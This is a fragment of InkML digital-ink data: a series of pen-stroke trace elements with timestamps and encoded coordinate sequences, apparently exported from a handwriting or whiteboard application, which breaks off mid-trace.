  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="77126.018">21163 10081 110 0,'0'0'163'0,"0"0"-10"16,0 0-3-16,0 0-11 0,0 0-10 0,0 0-13 15,0 0-10-15,0 0-16 0,0 0-7 0,0 0-5 16,0 0-20-16,0 0-3 0,6 8-8 0,-6-6 3 16,-1 3-6-16,1 6-13 0,-1-1-1 0,-2 0-26 15,3-2-17-15,-2 3-21 0,2 1-23 0,-2 1-20 0,0-3-11 16,2 6-23-16,0-4-99 0,0 1-227 0,0-6 101 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="77416.9102">21241 10316 33 0,'0'0'145'0,"0"0"-8"0,0 0-9 16,0 0-7-16,0 0-11 0,9 3 8 15,-3 1-4-15,1-3 0 0,1 2-3 0,1 1-4 0,4 2-9 16,-3 0-1-16,3-1-13 0,-1 2-4 0,3 0-11 16,-1 3-4-16,0-4-9 0,0 6-5 0,-1-7-1 15,-1 3-12-15,-2-1 4 0,2 1-9 0,1 1-7 16,0-1 4-16,-3-1-6 0,1 1-17 0,1 0-13 15,-1-1-17-15,-2 0-12 0,3-1-12 0,-3 0-18 16,-1-1-23-16,-2-2-20 0,2 1-12 0,-2 0-13 16,-2-1-112-16,-1-1-263 0,-3-2 117 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="77620.7493">21228 10477 21 0,'7'5'128'0,"0"-3"7"0,3 1 1 0,-1 1-12 15,5 1-4-15,-3-1-10 0,0-1 0 0,3 1-8 16,-1-2-4-16,2-1-3 0,-3 2-10 0,-2-2-7 16,3 3-6-16,-3-1-9 0,-2-2-4 0,3 3-29 15,-3-2-39-15,1 0-31 0,1 1-36 0,-1 1-41 16,-4 1-104-16,0-1-240 0,1 1 107 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="78627.6886">21871 10335 32 0,'1'-4'148'16,"-1"4"-17"-16,1-5 2 0,-1 5-3 0,6-4-13 15,-4 0-14-15,-2 4-8 0,4-2-3 0,-4 2-8 16,9-1-3-16,-1 2 3 0,3-1 9 0,0 0-12 16,1 1 2-16,3 0-3 0,-2 0-11 0,0 3-3 15,-3-1-6-15,-1 0-7 0,0-1-4 0,0 0-6 16,-4 2-5-16,3-1-4 0,-3-2-2 0,0 1-1 16,1 0-1-16,-3-1-2 0,-3-1-8 0,5 5-1 15,-2-2-3-15,-2 0-3 0,-1-3 1 0,2 4 0 16,0 0 3-16,-2-4-2 0,-3 7-3 0,1-3 0 0,-2 1-1 15,-1-1 4-15,-3 2-4 0,-1-2 0 16,0 4-3-16,0-2 2 0,-5-2 1 0,5 2-1 16,-6 1-7-16,-2-1 1 0,-2-1 5 15,2 0-2-15,0-1-1 0,4 1-2 0,1 0-1 0,2-2 0 0,2 2-3 16,1-4 0-16,0 5-5 0,2-2 3 16,0 2-2-16,0 0 7 0,2 4 0 0,2 1-2 15,1 1-1-15,3-2-3 0,-2 5 3 0,3 1 0 16,2 1-1-16,1-3 3 0,0-1 1 0,1-1-3 0,0 1-5 15,-2-2 6-15,-1-1-2 0,1-1-2 0,0 2 4 16,-3-6-1-16,0 1 0 0,1 0 0 16,0-1-1-16,-2 1 1 0,0-4 2 0,0 4 2 15,-1-3 0-15,-1-3-1 0,3 3 4 0,-3-3-3 0,0 0-2 16,-6 6 6-16,0-3 1 0,0-2-5 0,0 2-4 16,-3-3 7-16,0 0-1 0,0 0-3 0,0 1 2 15,0-1-17-15,1-1-20 0,8 1-27 0,-10 0-26 16,6 0-51-16,4 0-44 0,-9 0-143 0,9 0-347 15,0 0 153-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="78834.8324">22161 10773 126 0,'0'0'147'0,"0"0"-3"0,0 0-10 0,0 0-9 16,1 4-12-16,-1-4-11 0,0 0-11 0,0 0-12 15,0 0-13-15,0 0-19 0,0 5-26 0,3-3-27 16,-3-2-29-16,2 3-37 0,-2-3-34 0,4 4-57 16,0-3-176-16,1 1 77 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="79193.1866">22689 10465 19 0,'-4'3'129'0,"0"0"-17"16,-1-1 9-16,0 3-1 0,-3 3-6 0,-2 0 0 15,1 1-7-15,1-2 3 0,-2 4-14 0,0-2-8 16,-2 5 12-16,1 0-4 0,-1-1-8 0,1 1-7 0,1-2-3 16,1 2-7-16,0-2-1 0,0 2 5 0,-3 2-7 15,0-1-2-15,1 0-8 0,0-2-3 0,-1 3-6 16,0 1-5-16,-1-3-3 0,0 3-4 15,-5 2-3-15,4-4-4 0,0 0 0 0,0-2-6 0,-1 1-6 16,4-6 0-16,1 4-11 0,0-3-5 16,4 1-13-16,-1-7-24 0,0 4-22 0,1 0-23 0,1-4-24 15,3-1-19-15,-1 1-26 0,2 1-20 0,1-4-105 16,-3 3-296-16,3-3 130 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="80815.0622">22999 10505 67 0,'0'0'90'15,"0"0"0"-15,0 0-8 0,0 0-4 0,2-2-9 16,-2 2-4-16,0 0-8 0,0 0-5 0,0 0-4 16,0 0-6-16,0 0 0 0,-23 5-5 0,11 0 6 15,-1 0-10-15,-5-1 0 0,-1 2-7 0,-6 3 6 16,-6 0-3-16,4 3-6 0,-1-3-3 0,4 2 2 15,-2 1 3-15,2-1-2 0,6-1 0 0,0-3 3 16,3 1-4-16,3-2 3 0,2 1-4 0,0-1-1 16,1 1 8-16,1 1-9 0,-2 1-3 0,6-3-3 15,-1 4-3-15,5 1 7 0,-4 1 5 0,4-1-5 16,4-1-7-16,1 4 3 0,4 1 1 0,1-4 0 16,-1 3-2-16,5 0-1 0,3-1 3 0,0 0-5 0,-1-1 4 15,2-1 2-15,6 2-1 0,-7-1-4 16,0-5 3-16,-1 5-8 0,2-5 3 0,-4 3-1 15,0-4 0-15,-5-3-2 0,0 4-3 0,1-2 1 0,-1-1-13 16,-2-3 0-16,-2 2-11 0,-1 0-2 0,2-2-14 16,-3 2 3-16,-3-3-7 0,0 0-22 15,11-2-13-15,-6 0-17 0,0-2-15 0,3 1-74 16,0-3-197-16,-2-4 87 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="81060.2294">22848 10775 41 0,'-20'16'119'0,"-3"-2"-8"16,8 0-2-16,0-4-11 0,0 3-12 0,2-2-1 15,1 0-13-15,0 3-5 0,2-6-2 0,1 1-13 16,0 1-3-16,3-1-6 0,-4 0-6 0,2 0-23 16,0-4-26-16,4 1-22 0,-2 1-24 0,2-2-14 15,-1 2-74-15,4-2-157 0,-2-1 69 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="82413.6264">23256 10697 11 0,'0'0'68'16,"0"0"-2"-16,0 0-3 0,0 0-1 0,2-3-9 16,-2 3 4-16,0 0-12 0,0 0 4 0,0 0-5 15,0 0 5-15,0 0-13 0,0 0 1 0,0 0-3 16,0 0-1-16,0 0-6 0,0 0-12 0,0 0 16 0,0 0-17 16,0 0 4-16,0 0-3 0,0 0 4 15,0 0 6-15,-7 10-1 0,3-4 10 0,-5 1 5 16,0 2-2-16,0-2 5 0,-4 6-5 0,1 1 2 15,-5-1 2-15,-2 4 11 0,-3 1-8 0,1 0-1 16,0 0 2-16,6-3-2 0,-1-2-4 0,-4 5-1 0,-3 0-6 16,1 0 5-16,2 1-3 0,1-1-4 15,3-3-1-15,0-2-1 0,2 1 0 0,1-4-4 16,3 4-4-16,1-6 1 0,0 3-4 0,1-4-9 0,2-2 2 16,-1 0 0-16,3-2 3 0,2 4-6 0,-1-4 1 15,-2 0-2-15,4-1 5 0,1-2-8 0,-4 2 2 16,4-2 3-16,0 0-11 0,-4 4-4 15,4-4-7-15,0 0-14 0,0 0-11 0,-3 1-13 0,3-1-18 16,0 0-7-16,0 0-19 0,0 0-27 0,0 0-102 16,0 0-244-16,12-11 108 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="83231.6342">23374 10791 70 0,'0'0'75'16,"0"0"-1"-16,0 0-14 0,2-2 0 0,-2 2-4 15,0 0-7-15,0 0-10 0,0 0-1 0,16 7 4 16,-9-6-6-16,1 2-1 0,2 1-1 0,-3 1-8 16,2-3 7-16,-2 6-4 0,2-2 1 0,1-2-6 15,-5 4 16-15,3-3-14 0,0 2 6 0,-5-2-9 0,4 0 3 16,-3-1-1-16,1 1-4 0,-1-1 0 16,-3 2 8-16,3-3-4 0,-3-1-3 0,2 4 3 15,-3-6-10-15,1 5 10 0,-2-2 9 0,1-3-3 16,-3 7-2-16,-2-3 6 0,-4-1 3 0,-1 2-2 0,-1-2-1 15,-4 1 2-15,-1 2-2 0,2-2 1 0,2-1-1 16,-2-2-4-16,2 2 4 0,0-2-12 0,-1 1 0 16,2-2 0-16,2 2-7 0,2-1 1 15,0 0-2-15,0 2-2 0,2-1-3 0,1 0 0 0,2 2-2 16,-2 2-4-16,1 1 4 0,2 3-3 0,-2-1 4 16,3 4-1-16,3-2-2 0,-2 4 8 0,3-5-6 15,-1 0-3-15,-1 3-4 0,2-3 2 0,0 1 0 16,-1-3 5-16,-2-1-3 0,0-1-1 0,-1-1-7 15,3 0 6-15,-3 0 7 0,-3-1-1 0,-1-1 3 16,-2 0-2-16,-6 1 3 0,-7-1 9 0,0 0-1 16,-3-3 0-16,1 0 4 0,-1 0 1 0,1 0-4 15,-2-3-2-15,3 2-5 0,7-1 3 0,-5-2 2 16,4 3-4-16,4 0-6 0,2 0-18 0,3 0-35 16,-3-1-36-16,8 2-17 0,-5-1-13 0,5 1-20 15,0 0-25-15,0 0-102 0,18-1-277 0,-4 0 123 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="83597.6656">23725 11046 121 0,'-6'0'129'16,"-6"2"-3"-16,2-1-2 0,-3 1-10 0,-1 5-8 15,3-3-4-15,-1 5-18 0,-2-1 1 0,5 0-15 0,0 1-4 16,-2 4-7-16,3 1-12 0,3-2-1 0,-1 3-6 16,2-1 1-16,-1 3-5 0,0-1-4 0,2 1-3 15,3 1 4-15,-1-3-14 0,0 2 6 16,-1-5-8-16,0 0-3 0,2 1 1 0,-2 0 1 0,1-1-2 15,0-1-4-15,0 0 3 0,-2-4-1 0,-1 2-2 16,-2-2 0-16,-2 1 5 0,-2 4 3 0,-7-3-6 16,3-2 3-16,-4-1-6 0,0-2 2 15,-1-1-3-15,-1-1 2 0,2 1-2 0,-1-1 0 0,-1-2-3 16,5 0-14-16,2-1-6 0,-2-3-21 0,5 0-31 16,0-2-25-16,-2-1-29 0,4 0-120 0,3-2-261 15,-1 1 116-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="83820.3895">23720 11117 4 0,'14'14'138'0,"-2"1"-13"0,1 1-2 0,2 0-4 15,3 1-13-15,-3-3-4 0,-1-1-6 0,1 0-8 16,-2 2-14-16,1-3-8 0,-2 1-1 0,-1-1 5 16,-2-2-19-16,0 0-14 0,0-1-25 0,-3-2-30 15,2 1-18-15,-3 0-28 0,-1-1-29 0,-4-2-85 16,0 1-193-16,-5-1 87 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="84222.2956">22071 10867 42 0,'31'47'110'0,"4"2"-10"15,27 17-1-15,-4 2 0 0,4-6-9 0,6 2 8 0,4-4-27 16,-2 0 7-16,0-3-4 0,1-1 1 16,-2 1-11-16,-25-18-8 0,28 16 3 0,-20-17-5 15,22 11-13-15,-24-17 7 0,3-1-7 0,-1 3 1 16,0-5-2-16,3 0-2 0,-1 0-3 0,-1-3-4 0,-4-4 0 16,-1-1-1-16,-14-6-10 0,-2-5 3 0,3 4 1 15,-6-6-2-15,1-1 0 0,-4-3 4 0,-5-1 3 16,-4-1 6-16,-2 0 5 0,0-2 3 0,0-2 2 15,-2-1-6-15,4 0 0 0,2-1-2 0,0-6-1 16,1 3-1-16,-1-5-2 0,2-5-2 0,1 0-1 16,-2-2-3-16,-1-2 1 0,1 0-1 0,-4 0-6 15,1-4 10-15,-4 2 0 0,3-3 2 16,-4 2-5-16,2 0-3 0,-7-1-13 0,0 5-15 0,-3 1-29 16,0 2-67-16,-4-9-65 0,-8 8-190 0,0 0-383 15,-10-1 170-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="123794.0234">8624 9914 14 0,'0'0'71'15,"0"0"-16"-15,0 0-1 0,0 0-6 0,0 0-3 16,0 0-5-16,0 0-3 0,0 0-7 0,0 0 2 15,0 0-2-15,0 0-7 0,0 0-4 0,0 0 7 16,0 0-3-16,0 0-2 0,0 0 0 0,0 0 0 16,0 0 6-16,0 0-9 0,0 0 3 0,0 0 0 15,0 0-1-15,0 0-5 0,0 0 0 0,0 0-4 16,0 0 1-16,0 0 2 0,0 0 10 0,0 0-8 0,0 0 0 16,-2 3 1-16,2-3 0 0,0 0 9 15,0 0-2-15,0 0 5 0,0 0 8 0,0 0-2 16,0 0 15-16,0 0-7 0,0 0-1 0,0 0 3 0,-3 2 0 15,3-2-3-15,0 0 6 0,0 0 2 16,0 0-7-16,0 0-1 0,0 0-3 0,0 0 0 0,0 0-7 16,0 0-1-16,0 0 1 0,0 0-4 15,0 0-2-15,0 0-5 0,0 0 0 0,0 0-5 0,0 0 0 16,0 0-2-16,0 0-2 0,0 0 4 0,0 0-10 16,0 0-1-16,0 0-1 0,0 0 1 0,0 0 0 15,8 3-4-15,-8-3 0 0,4 5 6 0,1 1-4 16,1 2 1-16,2 2 1 0,0-3-2 0,-1 2 1 15,7 1 2-15,-1 3-1 0,1-2-3 0,4 1 3 16,-4 1 1-16,9 3-5 0,0 0 0 0,0-2-1 16,0 3 2-16,-1-2-3 0,2 1 2 0,2-4-3 15,-1 2 4-15,-2 1 2 0,4-1 1 0,-1 1-3 16,-1-2 2-16,1 1-1 0,2-2-4 0,1 1 2 16,-2 3 2-16,5-2 0 0,-6-3 2 0,3 2-2 15,2 0-3-15,1-3 10 0,-3 2-8 0,3 0-3 16,0 0 6-16,2-2-1 0,3 2 1 0,2-1-3 15,11-3-2-15,-2 6 0 0,-8-10 6 0,-2 3-8 16,13-1-9-16,-11-4 15 0,11 5 1 0,7-4 1 16,-18-3-1-16,17 1 1 0,-1-4-1 0,-4 2 6 15,5-3-7-15,-4 1 6 0,-2 0-4 0,3-5 2 16,-16 3-4-16,1 2-1 0,0 3 3 0,-3-3-3 16,1 0 0-16,-1-1 1 0,-4 1-4 0,0 1 3 15,-1 0-1-15,-1 0 0 0,-2 1-1 0,3-1 2 0,-3 4-2 16,-5-4 5-16,-3-1-4 0,9 1-1 0,-9 0-2 15,2 3 0-15,7-1 2 0,-7-3 5 0,6 0-5 16,-1-1-2-16,-4-1 2 0,-4 3 0 16,0-1 1-16,3 1 0 0,-5-3 3 0,2 2-4 0,-1-3-1 15,-2 1-2-15,2-1 8 0,-5 2-1 0,-3-1-1 16,3 0 4-16,-3-2-3 0,2 0 4 0,-2-1-2 16,4-3-6-16,0-2 8 0,3-7 4 0,1 0-5 15,1-5-9-15,-4 1 6 0,4-1 1 0,-5 0 5 16,4 1-6-16,-8-1 6 0,4 2-4 0,2-1-1 15,-4 1 1-15,3 0 1 0,-4 0-4 0,3-3 0 16,-2 3 4-16,-1 0-8 0,-1-1 4 0,1 2 1 16,0-2-3-16,-5 5 0 0,2-5 3 15,0 0-3-15,-2-1 3 0,1 0-3 0,-2-1 2 0,-3-2-4 16,2-1-2-16,0-3 4 0,-4 0-1 0,0 0 3 16,-3-1-6-16,2 1 1 0,-3-1 2 0,0 1 2 15,-2 0-3-15,-4-4-1 0,-2 1 0 0,-2 2 2 16,0 1 1-16,0 3 2 0,-2-2-2 0,-5 3-5 15,3-5 3-15,-2 4 3 0,-3 4 0 0,-2 0-3 16,1-1 3-16,-4 2-5 0,-8-9 3 0,7 9-3 16,-2 2 3-16,-1-1 0 0,-10-2-2 0,10 2-1 15,-11-4 4-15,9 8-7 0,-13-3 3 0,14 5 1 16,-18-5 0-16,1 3 2 0,2 0-4 0,-5 3 2 16,-2 0-2-16,-2 2 0 0,-1-2 2 0,-2-1 2 15,-4 1-5-15,2 2 1 0,-1 0 6 0,-28-7-2 16,29 7-3-16,0 0 0 0,0 2 6 0,-4-3-6 15,-24-4-1-15,27 8 0 0,-30-5 2 0,29 7 0 16,-30-3-3-16,1 6 2 0,25 0 3 0,-21 3-1 16,25 1 7-16,-1 5-1 0,-27-3-5 0,28 9 2 15,-1-3 2-15,-28 6-3 0,30-1 0 0,4 0-1 16,2 2 6-16,-1 1-1 0,-2 1-5 0,5 2-1 16,4-2 1-16,17-3 2 0,-1 3-3 0,3 0 4 15,0 2-3-15,4 2 1 0,5 1 0 0,0 3-3 16,4 1 3-16,2 3-6 0,3 0 2 0,3 4 7 0,2 3-5 15,0 11 1-15,6 2-1 0,4-1 0 16,1 4 0-16,4 0-1 0,2 2-1 0,3 3 3 16,2 0-2-16,5 0 0 0,-3 3-5 0,4 0 2 15,8 20-1-15,-10-27-2 0,6-1-3 0,1 0 4 0,3 2 1 16,-3-6-10-16,3 1-1 0,4-4 4 16,2 0 0-16,-1 1 3 0,0-6-4 0,8 1-7 15,-3-2-2-15,4-2-4 0,3-2 1 0,1-2-5 16,0-4 2-16,-1 1-12 0,2-3-5 0,1 0 5 15,1-5-8-15,2-1-20 0,2 1 1 0,1-8-18 0,-1 5 14 16,2-7-15-16,-3-1-18 0,0 1-4 16,-1-1-10-16,-13-3-74 0,2-2-207 0,0 1 92 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="133878.0899">13036 9580 87 0,'9'-2'102'0,"-9"2"7"0,8-1-5 0,-8 1 1 16,6-3 4-16,-6 3-16 0,5-2 0 15,-5 2 6-15,5-4-4 0,-5 4 2 0,6-4-1 16,-4 3-2-16,-2 1-9 0,6-5 2 0,-3 1-8 16,-2 0-2-16,0-2-7 0,3 1-2 0,-4-2-5 0,4 1-6 15,-1-1 2-15,-2 1-1 0,-1-1 0 0,0 2-3 16,0-3-3-16,1 2 2 0,-1 2 3 0,0-1-3 16,-1-1-5-16,1 1 4 0,-4-1-4 15,0-1-6-15,-1 3-5 0,0-3-2 0,-5 1-2 16,-2 2-3-16,3 0-6 0,-6-3 4 0,0 5-4 0,-4 0-2 15,-1 2-3-15,1 1 3 0,-3 2-5 16,-4 4-5-16,8-1 2 0,-9 2-4 0,1 4-1 0,7-2 0 16,-3 4 2-16,1 3-5 0,6-4 3 15,0 3-4-15,4 0 0 0,-1-1-4 0,1 1 3 0,3 2-3 16,2-1-1-16,1 2-1 0,2-4 0 0,3 3-11 16,0 0-9-16,5-2-20 0,1-2-16 0,3 0-17 15,1 0-22-15,2-3-14 0,4 2-15 0,1-3-27 16,1-1-9-16,9 3-12 0,-3-5-147 0,3-3-345 15,3-1 153-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="134367.1344">13464 9653 48 0,'0'-4'184'0,"0"-4"0"15,-2 2-7-15,-1 2-10 0,2-5-7 0,-2 3-8 16,-1-5-7-16,-4 5 0 0,2-1-3 0,-1 1-2 16,1-2-14-16,-4 4-9 0,3 1-8 0,-2-3-2 15,0 2-6-15,-4 2-8 0,3 2-8 0,-3 0-7 16,-5 4 1-16,0 2-17 0,-1 3-6 0,-4 6-2 16,0 2-5-16,4 2-5 0,4-5-5 0,-1 1-5 15,3-1-2-15,3 2-3 0,2-1-4 0,4 1-2 16,2-4-2-16,1 2-2 0,2-3 0 0,2 1-4 15,2-2-1-15,2 4 0 0,1-3-3 0,0-3-1 16,3-1-2-16,3 2-2 0,4-3 2 0,-2-2-2 16,-2-2 2-16,1-2-3 0,4 0 1 0,-6-2 2 15,1 0-5-15,-1-2 2 0,-3 1-2 0,1-2-2 16,-2 0 5-16,-1-3-1 0,1 1-3 0,-3 0-1 0,2-2 4 16,-3 0-1-16,0 2-5 0,-1-4 6 15,-3 5-2-15,3-3 0 0,-3 1 3 0,-1 2-3 16,2-1-3-16,-1 1 8 0,-2 1-7 0,1-1 2 15,-2 3 0-15,2-1-1 0,0 4 1 0,-1-7-3 0,0 4 1 16,1 3 0-16,0 0 8 0,0 0-8 0,0 0-4 16,0-4 0-16,0 4 4 0,0 0-5 0,0 0 1 15,-5 21 1-15,1-10 3 0,0 0 0 16,0 6 1-16,-1-2-4 0,3 1-2 0,-1 2-11 0,3-6-26 16,-1 3-25-16,1 2-27 0,1-6-25 0,0 0-28 15,1 0-23-15,2-2-17 0,-1 2-17 16,3-4-164-16,-3 0-396 0,6 0 175 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="134825.9405">14035 9626 19 0,'-5'-3'117'0,"3"-1"-11"0,-2 1-2 16,0-3-6-16,0 3-9 0,4 3-1 0,-5-6-11 16,4 4-15-16,0-3 9 0,1 5-8 0,-4-4 2 15,1 0-2-15,3 4-1 0,-2-3-1 0,2 3-3 16,-4-3 7-16,4 3-6 0,-4-3-6 0,4 3 7 15,0 0 3-15,0 0 1 0,-4-3-3 0,4 3-5 16,0 0 8-16,0 0-2 0,0 0-3 0,-4-2-1 16,4 2-6-16,0 0 1 0,0 0-5 0,0 0-4 15,-5-1-6-15,5 1-3 0,0 0-6 0,-4 6 0 16,-2 0-1-16,1 4-4 0,-4 7 3 0,-4 8-2 16,-1 1-2-16,-3 4 3 0,2 1 1 0,-4 2-2 15,0 9-2-15,4-10-3 0,-1 12-1 0,7-13 1 16,-1 0-4-16,0 1-2 0,5-2-2 0,2-1 2 15,-2 0-1-15,1-2-4 0,4-6-3 0,0-2-3 16,0-2-2-16,0 0-7 0,3-1-12 0,-3-4-22 16,1 0-29-16,-1-5-19 0,0 3-11 0,0-2-14 15,4-4-6-15,-4-1-4 0,0 1-13 0,0-4-7 16,0 0-19-16,0 0-91 0,0 0-273 0,0 0 121 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="135060.2801">13614 9743 74 0,'-3'-4'123'0,"3"0"7"16,0 0-10-16,3 1-6 0,1-1 6 0,3 2-3 16,3-2-3-16,3 1-2 0,0 0-9 15,7 4-8-15,2-2-2 0,-3 1 4 0,12 1-6 16,-4 1-11-16,-5 2-7 0,7 1 2 0,-4 0-10 15,-4 2-3-15,1-1-8 0,-2 0-4 0,-1 1-3 0,2-1-9 16,-5 5-4-16,4-2-10 0,-4-1-26 0,0 2-34 16,0-1-32-16,0 0-30 0,0 1-32 15,-2 2-29-15,1-1-110 0,2-2-292 0,-2 0 130 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="135736.6503">15288 9754 18 0,'-4'-8'171'15,"0"-1"-17"-15,0 1-9 0,-1-2 0 0,-5-2-7 16,-3 0-12-16,3 2-10 0,-4-1-2 0,1 1-7 16,-5 0-7-16,3 3-9 0,-2-1-5 0,2 2-11 0,-3-1-6 15,-1 2-4-15,1 0-4 0,0 0-12 0,7 3-4 16,-3 0 0-16,1 0 0 0,0 1-3 0,-1 1-9 15,4 0-2-15,1 1-5 0,1 1 3 16,2 1-7-16,-2 4-1 0,3 0-6 0,1 5 1 0,0 1-1 16,2-3 0-16,1 7-5 0,1-2-1 0,2 4-3 15,-1-3 2-15,3 0 1 0,-3 1 2 0,3 0-4 16,-1-2-1-16,-2-2-3 0,0 3 1 0,1-5 1 16,0 0 1-16,-2-2-2 0,0 1-3 0,0 0 2 15,0-3 0-15,0 4 0 0,-2-6 1 0,2 0-3 16,-4 6 5-16,0 0-1 0,1-5-5 15,2 4 7-15,-3-3-5 0,2 0 0 0,1 0-2 0,-2 2 4 16,0 0-3-16,3 2 2 0,-1 1-1 0,1-1 2 16,1-2-3-16,-1 3 1 0,2 0-1 0,-2-1-3 15,2 0 2-15,0 2 1 0,-1-2 0 0,0 4 0 16,0 1 3-16,3-4-5 0,-4-2 0 0,1 3 4 16,1-3-3-16,-2 3 2 0,1-2 0 0,-1-1-1 15,0 2 2-15,-1-1-3 0,-2-1-2 0,-1 0 4 16,2-3-2-16,1 2 1 0,-3-4 0 0,4 3 0 15,-3-2 0-15,2-5 2 0,-2 6 4 0,1-2-6 16,0-1 4-16,-1 1-8 0,-1-1 6 0,1 0 0 16,1-2-1-16,-1-1 1 0,1 3-2 0,2-4 0 15,-6 4-2-15,5-1-8 0,-1 0 1 0,-1-1-1 16,0 1-1-16,1 3-10 0,1 0-20 0,1 1-7 16,0 0-23-16,-2-1-7 0,4 1-30 0,-1 1-15 15,0 0-11-15,2 2-15 0,-1-4-122 0,1 3-292 16,-2-5 130-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="136963.4569">13220 11013 116 0,'0'0'134'0,"7"-5"-4"0,-7 5-18 15,3-3-5-15,-3 3 0 0,5-2-11 0,-1 0-9 16,-4 2-7-16,7-1-8 0,-7 1 2 0,9 1-3 15,-3 2 1-15,4 0-7 0,-1 0-6 0,1 0-3 16,-1 1-7-16,0 1-6 0,0 0-2 0,0 0 3 16,-1-1-9-16,-2 3-5 0,1-4-7 0,-1 1 5 15,0 1-2-15,-1-1-7 0,-2 1-2 0,1-2 6 16,-3 1-12-16,2 1 3 0,-5 1 8 0,-1 1-9 16,-3 2 1-16,-5 3-1 0,1 0 5 0,-7-2-10 15,-1 0 2-15,0 1 3 0,3-3-2 0,-5 0 11 16,4-2 3-16,-3 0-2 0,8 0 0 0,-2 1 4 0,3-4-2 15,2-1-1-15,-1 2-12 0,4-2 5 16,1 1-5-16,0 0 0 0,3 2 4 0,0-3-7 16,1 6 1-16,0-2-6 0,3 2 4 0,1-1-2 0,3 3 1 15,2 0-6-15,0 3 6 0,3 0 0 0,2-1 1 16,-3 2-4-16,3-1 1 0,-3 3-5 0,0-2 2 16,1 2-7-16,-3 0 9 0,0 2 1 0,-4 0-4 15,0-2 2-15,-1 2 1 0,-4-1-1 0,0-1 0 16,1 3 0-16,-2-2-4 0,-3 0 1 0,-6-2 7 15,1 1-7-15,0 0 2 0,-5 1-1 0,3-5 0 16,-1 1 3-16,-2 1 0 0,3-2 2 16,-7 1 0-16,4-3-3 0,-4 0 3 0,1 2 2 0,-2-2 1 15,1-3 2-15,4 2-2 0,2-5 3 0,1 2 1 16,2-2 1-16,-1 0 0 0,1-1-3 0,5-1-1 16,0 1-5-16,-1 0 5 0,1-1-7 0,0 0 2 15,4-2-1-15,-5 6-5 0,6-3 0 0,-1-3-6 16,0 6-5-16,0-3-16 0,3 1-9 0,-2-1-5 15,-1 3-6-15,2-3-2 0,0 2 0 0,-2 0 0 16,1 0 1-16,-1-1-2 0,2 2 7 0,-2 1 5 16,-2-3 5-16,1 4-3 0,-1 0 3 0,-1-2 6 15,-1 2 2-15,1 1-1 0,-3-2 2 0,3 0-12 16,-4 0-15-16,-1-1-13 0,2 0-24 0,-3 0-33 16,0 0-110-16,-3 1-252 0,1-4 112 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="138626.2742">12696 9854 8 0,'0'0'68'15,"0"0"-4"-15,0 0-7 0,0 0-8 0,0 0-3 16,0 0-3-16,0 0-1 0,0 0-3 0,0 0 5 15,9 10 5-15,-4-5 10 0,4 3-16 0,0 0 18 16,6 4 5-16,-1 1 8 0,7 3-13 0,2-1 8 16,-1 1 1-16,7-1 5 0,2 3-5 0,-2-1 1 15,18 5-8-15,-12-5-3 0,11 2-4 0,2 6-6 16,-12-8-2-16,13 5-4 0,-2-1-1 0,0 1-1 16,-1-2-10-16,-11-3 0 0,13 7-4 0,0 0-1 15,0 0-4-15,-7 0 3 0,4 0-7 0,-14-4-30 16,-1 2-46-16,1-2-63 0,-4 3-153 0,-7 2-294 0,-2 1 130 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="142903.2756">14078 10222 53 0,'0'0'83'0,"1"-5"-4"16,-1 5 3-16,0 0-8 0,0 0-5 0,0 0-9 16,0 0-9-16,0 0 2 0,0 0 0 0,0 0-3 15,0 0-3-15,0 0-7 0,0 0-1 0,0 0-1 16,0 0-6-16,0 0 3 0,0 0-8 0,0 0-3 15,0 0-5-15,-10 11 9 0,7-6-10 0,-1 4-2 16,-1 0 8-16,0-1-1 0,-3 10 3 0,-1-2-4 16,-1 1 1-16,-4 6-7 0,3-1 17 0,-2 1-8 15,1-6 1-15,-3 6-2 0,6-6-2 0,0-2 1 16,-1 0-7-16,2-2 6 0,1-1-6 0,0-1 5 0,0 1-5 16,1-4 1-16,1 1 1 0,1 3-9 0,-1-7 5 15,-1 6-7-15,4-6 6 0,-1 1 0 16,0 0-4-16,2-3 6 0,-2-1-7 0,3-2 3 15,-3 7-2-15,1-4 4 0,2-3-1 0,0 4-7 0,0-4 6 16,0 3 5-16,0-3-1 0,0 0 1 16,0 0 0-16,0 0 5 0,0 0-4 0,-4 3 7 15,4-3 2-15,0 0 1 0,0 0 0 0,0 0-2 16,0 0-3-16,0 0 0 0,0 0-2 0,9-13-4 0,-5 6-7 16,0 4 5-16,2-9-3 0,1 6 1 0,-1-6-1 15,2 4-6-15,2-2-1 0,-3 3 1 0,0-1 2 16,2 2-4-16,0-1-1 0,0 0-5 15,-1-2 6-15,-3 2-2 0,6 1 0 0,-3-1 2 0,1 0-1 16,-1 0 1-16,1 2 1 0,-7-1-5 0,5 2 2 16,-4 1 0-16,3-1-2 0,-4 2-2 0,-2 2-1 15,6-1 2-15,-6 1 2 0,3-5-3 0,-3 5-1 16,4-2-2-16,-4 2 2 0,0 0 1 0,0 0 1 16,9 4 1-16,-7 0 3 0,2-2-1 0,0 4-4 15,1-2 1-15,-1 2 2 